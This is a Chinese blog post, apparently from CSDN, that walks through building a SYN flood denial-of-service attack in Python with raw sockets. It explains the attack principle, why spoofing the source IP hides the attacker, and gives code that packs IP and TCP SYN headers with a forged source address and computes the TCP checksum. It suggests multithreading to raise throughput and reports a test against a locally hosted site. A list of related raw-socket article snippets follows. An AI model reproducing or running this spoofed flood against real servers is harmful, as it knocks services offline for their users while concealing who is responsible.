基于SOCK_RAW的泛洪攻击

最新推荐文章于 2022-10-19 00:33:11 发布
最新推荐文章于 2022-10-19 00:33:11 发布
阅读量200 收藏 1
点赞数
文章标签: 网络安全 dos python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/doris_70/article/details/117330790
版权

基于SOCK_RAW的泛洪攻击

一、基础环境

网站所在系统环境: Windows 10 专业版

程序运行环境: Linux ubuntu 5.9.1

监测软件: Wireshark 3.4.3
语言: Python

二、攻击原理

在基本的传输控制协议TCP中,发送方与接收方在正式收发数据前会先进行“三次握手”,即发送方首先发送SYN数据包,请求确认;接收方收到后发送ACK+SYN数据包;发送方收到确认后回复ACK数据包,到此正式建立链接,可以开始传输数据了。

DoS攻击中的泛洪攻击原理就在于利用这三次握手的过程,向服务器端发送大量的半连接请求,服务器接收到连接请求(SYN)后,会发送确认包并进入等待确认状态,当该类无效请求达到一定的数量后,服务器就无法响应正常的请求,造成网络拥塞。

三、过程

1. 分析SYN数据包

一个正常访问百度时,抓取的SYN数据包的具体内容:
包含四部分内容,Ethernet Ⅱ 头,IPv4 头,TCP 头,自定义数据;其中Ethernet Ⅱ是工作在数据链路层,提供介质访问并管理链路,在Socket编程中,我们可以不关心其具体的内容。

IP协议工作在网络层,功能是寻址和路由选择,所以在IP头部中要指明源

IP和目的IP地址,另外还有其他相关属性信息位,如下图所示:
在这里插入图片描述

TCP协议工作在传输层,通过该协议建立端到端连接,所以其中包含目的和源端口号,以及三次握手过程会涉及到的序号,确认号,ACK、SYN等标志位信息。

2. 明确构造内容

1)伪造源IP地址

在TCP握手协议中,服务器端在接收到请求后会返回确认信息,在DoS攻击中,如果攻击者发送到数据包中是真实地址,那么海量的数据同样会从服务器端返回到自身,造成自身端口阻塞。所以,泛洪攻击中很重要的一点是伪造源地址,这样也能够达到隐藏自身的目的。

2)构造TCP头

通过合理设置SYN,ACK等标志位以及相关属性,就能让服务器将我们构造的数据包识别为正常的访问申请,进入握手协议中的等待确认阶段,达到浪费服务器资源的目的。

3. 使用工具

Socket技术给程序员提供了操作这些协议的接口,在此就利用该种技术,实现我们的目的在第2步中,我们知道了我们要编辑的协议内容,所以根据这样的需求选择构造原始套接字(SOCK_RAW),通过这类套接字开发人员可发送自己组装的数据包到网络上,这就我们构造自己的SYN数据包提供了可能。

4. 具体实现

具体的构造内容就可以根据抓取到的正常的的数据包进行标记,在这个过程中就可以把我们 伪造的源地址嵌入其中,其中要注意的原始套接字中构造TCP协议头时,还需要自己计算校验 和,具体实现参考源码。

   #IP header
     Version=4 #4bit
     IHL=5 #4bit
     Version_IHL = (Version << 4) +IHL
     tos=0 #Type of service 8bit
     tl=4 #total length (16bit)
     id=0 #(16bit)
     frag_off=0# Fragment Offset 13bit
     ttl=64 #time to live 
     protocol=socket.IPPROTO_TCP#(8bit)
     check=0 #checksum (16bit)
     s_addr=inet_aton(self.ip)
     d_addr=inet_aton(self.tgt_ip)
 #pack方法自己查哟
     ip_header = pack('!BBHHHBBH4s4s',Version_IHL,tos,tl,id,frag_off,ttl,protocol,check,s_addr,d_addr)

 #TCP header
        source = 59796 # 16
        dest = 8016 #16
        seq = 0 #32
        ack_seq = 0#  32 acknowledgement number
        doff = 5 #4 data offset
        #FLAG bit
        urg = 0 #URG urgent pointer
        ack = 0 # ACK
        psh = 0 # PSH
        rst = 0 #
        syn = 1 #
        fin = 0 #
        window = htons(5840) #16 window size
        check = 0 # 16 TCP check sum
        urg_prt = 0 #16 urgent pointer 
        offset_res = (doff << 4)+0 
        tcp_flags = fin + (syn << 1) + (rst << 2) + (psh << 3) + (ack << 4) + (urg << 5) #6
        
        tcp_header=pack('!HHLLBBHHH',source,dest,seq,ack_seq,offset_res,tcp_flags,window,check,urg_prt)
        src_addr = inet_aton(self.ip)
        dst_addr = inet_aton(self.tgt_ip)
        place = 0
        protocol = socket.IPPROTO_TCP
        tcp_length = len(tcp_header)
        
        psd_header = pack('!4s4sBBH',src_addr,dst_addr,place,protocol,tcp_length);
        psd_header = psd_header + tcp_header;
       #先把ck_sum的位置留出来,然后计算得到结果后,再重新组装
        tcp_checksum = self.checksum1(psd_header)
        tcp_header = pack('!HHLLBBH',source,dest,seq,ack_seq,offset_res,tcp_flags,window)+ pack('H' , tcp_checksum) + pack('!H' ,urg_prt)

另外,为了能够发送足够的数据包,可以利用多线程技术,这样可大大提升发送速度。
linux的多线程就很easy了

5. 测试攻击效果

​ 1)部署网站

​ 将过去编写的一个极其简陋的网页部署在了本地(win10),限制信息如下:

在这里插入图片描述

​ 2)攻击测试

​ 在这个过程中,发现了一个问题,Window下无法发送原始套接字,总是会提示无效参数,通过阅读微软官方文档,发现Windows对要发送的包作了限制,如果源IP地址不正确,恶意代码不能通过伪造的源IP地址进行拒绝服务攻击,也不能发送IP欺骗数据包。

​ 所以,解决方式就是,转去linux运行,稍微修改thread等格式,就可以成功运 行了。

​ 3)抓包观察

​ 可以看到短时间内该网站接受了大量的访问请求,且成功了伪造了IP地址,
在这里插入图片描述

70?琦玲!
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
示范了Unix和Linux下如何利用Raw Socket构造伪装的TCP、IP、UDP的包 (2001-01-20, Unix_Linux, 10KB, 2625次)
05-07
示范了Unix和Linux下如何利用Raw Socket构造伪装的TCP、IP、UDP的包 (2001-01-20, Unix_Linux, 10KB, 2625次)
windows socket ipv6 SOCK_RAW
weixin_34015566的博客
01-22 645
bind处一直报错WSAEADDRNOTAVAIL10049,不知道为什么? WSAEADDRNOTAVAIL10049 Cannot assign requested address.The requested address is not valid in its context. This normally results from an attempt to bind to...
SOCK_RAW
5G砖家的博客
12-08 227
如果要自己填充IP头,必须让内核放弃自动填充IP头的操作,否则会出现两个IP包头,导致整个IP包数据崩盘。 socket选项中的IP_HDRINCL选项,它的作用就是告诉内核不要填充头部,这个选项常用于黑客技术中,隐藏自己的IP地址。 Windows下:setsockopt(sock, IPPROTO_RAW, IP_HDRINCL, &val, sizeof(val)); Linux下:setsockopt(raw_sock, IPPROTO_IP, IP_HDRINCL, &on, s.
RAW SOCKET实现ICMP重定向攻击
Zzxy
04-06 4047
实验记录
有关raw socket的一些知识
lhuoshan的专栏
07-20 812
<br />有关raw socket的一些知识<br /><br />    众所周知,通过socket编程,我们能够实现机器之间的通信.在TCP/IP协议<br />簇(PF_INET)中,可以建立面向连接的SOCK_STREAM类型的socket,非连接的<br />SOCK_DGRAM类型的socket.事实上,在所有的网络程序中,也是这两种socket用<br />的最为广泛.除此之外,还有一些不常用的socket类型,它们却是在某些网络通<br />信中担当重要的角色.这里要讲的就是这么一种soc
网络骇客初级之原始套接字(SOCK_RAW
weixin_34050519的博客
04-08 182
网络骇客初级之原始套接字(SOCK_RAW)本文用实际程序完成了MAC数据包分析,网络数据分析,MAC地址扫描器和飞秋欺骗在这里我把原来的入门改成了初级,因为对于原始套接字的操作确实在普通的TCP,UDP之上TCP和UDP确实涵盖了普通的网络应用程序,但请注意“普通”二字,要成为一名骇客的你,可不能仅仅满足于写一些普通的网络小程序,而要直接对所有数据包进行分析,还要能够发送自...
SOCK_RAW.rar_RAW_SOCK_R_SOCK_RAW Pi_sock_raw_windows SOCK_R
09-20
`SOCK_RAW`是一种网络套接字类型,它允许程序员直接访问网络协议栈,从而能够发送和接收原始数据包,而不受高层协议(如TCP或UDP)的约束。本篇文章将深入探讨`SOCK_RAW`的概念、其在Windows环境下的应用以及如何...
linux_sock_raw.rar_RAW_linux sock raw_原始套接字
09-20
本资料“linux_sock_raw.rar”详细介绍了如何在Linux系统中使用原始套接字进行编程,以实现更底层的网络通信功能。 一、原始套接字的概念 原始套接字是一种特殊类型的网络套接字,它允许用户绕过操作系统对网络...
SOCK_RAW_using_in_linux.rar_RAW_linux sock raw_raw sock_sock RAW
09-23
在Linux操作系统中,SOCK_RAW是一种特殊的套接字类型,它允许程序员访问网络协议栈的底层,从而可以发送和接收原始的数据包,而不局限于特定的网络协议。这种类型的套接字通常用于创建自定义的网络协议,或者进行...
SOCK_RAW-FOR-Linux.rar_RAW_SOCK_RAW perl_linux sock raw_sock_ra
09-24
在Linux操作系统中,SOCK_RAW是一种特殊的套接字类型,它允许程序员访问网络协议栈的底层功能,从而能够实现自定义的网络协议或者获取原始数据包。本篇将深入探讨SOCK_RAW的工作原理及其在Perl语言中的应用。 一、...
RawSend_RawSocket基于MAC发送_sock_raw_C++_原始Socket发送_
10-03
在本主题中,“RawSend_RawSocket基于MAC发送_sock_raw_C++_原始Socket发送_”指的是使用C++语言通过原始套接字(Raw Socket)向指定MAC地址发送以太网数据帧的过程。以下将详细介绍这一技术及其相关知识点。 1. **...
SOCK_RAW发送tcp数据包(点对点)
weixin_42694291的博客
07-23 2145
1.server #include &lt;stdio.h&gt; #include &lt;stdlib.h&gt; #include &lt;string.h&gt; #include &lt;unistd.h&gt; #include &lt;sys/socket.h&gt; #include &lt;arpa/inet.h&gt; #include &lt;netinet/in.h&g
原始套接字-SOCK_RAW
wkk的博客
10-19 6124
winsocket通信 原始套接字sock_raw ping程序实现
raw socket 实现简单 tcp 协议栈
weixin_30247781的博客
08-20 1293
raw socket 实现tcp三次握手 最近由于项目需要对四层以下的协议添加一些支持,因此就想到了自定义TCP协议。 需要使用的方式就是raw socket,此处我们使用python 语言。 测试客户端 此处我们先使用一个简单的c语言的tcp服务器作为被测试目标。 这个服务器的功能就是简单的 [接受数据] ---> [返回数据] // tcpserv.c #include &lt...
raw_socket(原始套接字)以及普通socket使用终极总结
热门推荐
聆听风雨的博客
08-03 3万+
一、传输层socket(四层socket,普通socket) 可参考本人以下博客: Windows Socket编程之UDP实现大文件的传输:http://blog.csdn.net/luchengtao11/article/details/71016222 Windows Socket编程之TCP实现大文件的传输:http://blog.csdn.net/luchengtao11/arti...
Windows下通过使用RAW原始套接字进行抓包
gjtboa的专栏
01-06 3882
// 注意:原始套接字只在系统管理员权限下起作用,其它情况下socket创建失败,所以开发时首先以管理员权限启动VS SOCKET nAnniSock = socket(AF_INET, SOCK_RAW, IPPROTO_IP);  // 指定为原始套接字(IP层抓取) // 设置IP_HDRINCL选项,以便自己构造(解析)IP头部 BOOL bRaw = TRUE;
Windows下底层数据包发送实战
weixin_30386713的博客
11-09 782
1、简介   所谓“底层数据包”指的是在“运行”于数据链路层的数据包,简单的说就是“以太网帧”,而我们常用的Socket只能发送“运行”在传输层的TCP、UDP等包,这些传输层数据包已经能满足绝大部分需求,但是有些时候还是需要发送底层数据包的(例如SYN扫描),那么如何发送呢?   本文记录了我试图实现的过程中遇到的一些问题以及解决办法,需要注明:①本文只考虑Windows上的实现 ②本文主...
网络编程原始套接字
Try Try Again
03-09 1272
网络编程原始套接字 SOCKET_STREAM 流式套接字     SOCKET_DGRAM       SOCKET_RAW 原始套接字   IPPROTO_IP IP协议   IPPROTO_ICMP INTERNET控制消息协议,配合原始套接字可以实现ping的功能   IPPROTO_IGMP INTERNET 网关服务协议,在多播中
SOCK_RAWSOCK_STREAM 、SOCK_DGRAM 的区别
最新发布
05-25
SOCK_RAWSOCK_STREAM和SOCK_DGRAM都是socket编程中的套接字类型,用于不同的网络通信需求。 SOCK_RAW是原始套接字,可以访问底层协议,例如IP协议。使用原始套接字可以构造自定义数据包,但是需要自己实现协议的细节,因此使用RAW套接字需要具有一定的网络编程经验。 SOCK_STREAM是基于TCP协议的流套接字,提供可靠的面向连接的服务。使用SOCK_STREAM时,数据会被分成若干个数据块,每个数据块都会通过TCP协议进行传输,并且会保证数据的可靠性、有序性和不重复性。 SOCK_DGRAM是基于UDP协议的数据报套接字,提供不可靠的无连接服务。使用SOCK_DGRAM时,数据发送出去后,不会像TCP那样等待对方的确认,也不会保证数据的有序性和不重复性,但是传输速度会更快。 因此,选择套接字类型要根据具体需求来确定,如果需要快速传输数据,可以使用SOCK_DGRAM;如果需要保证数据可靠性和有序性,可以使用SOCK_STREAM;如果需要构造自定义数据包,可以使用SOCK_RAW
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值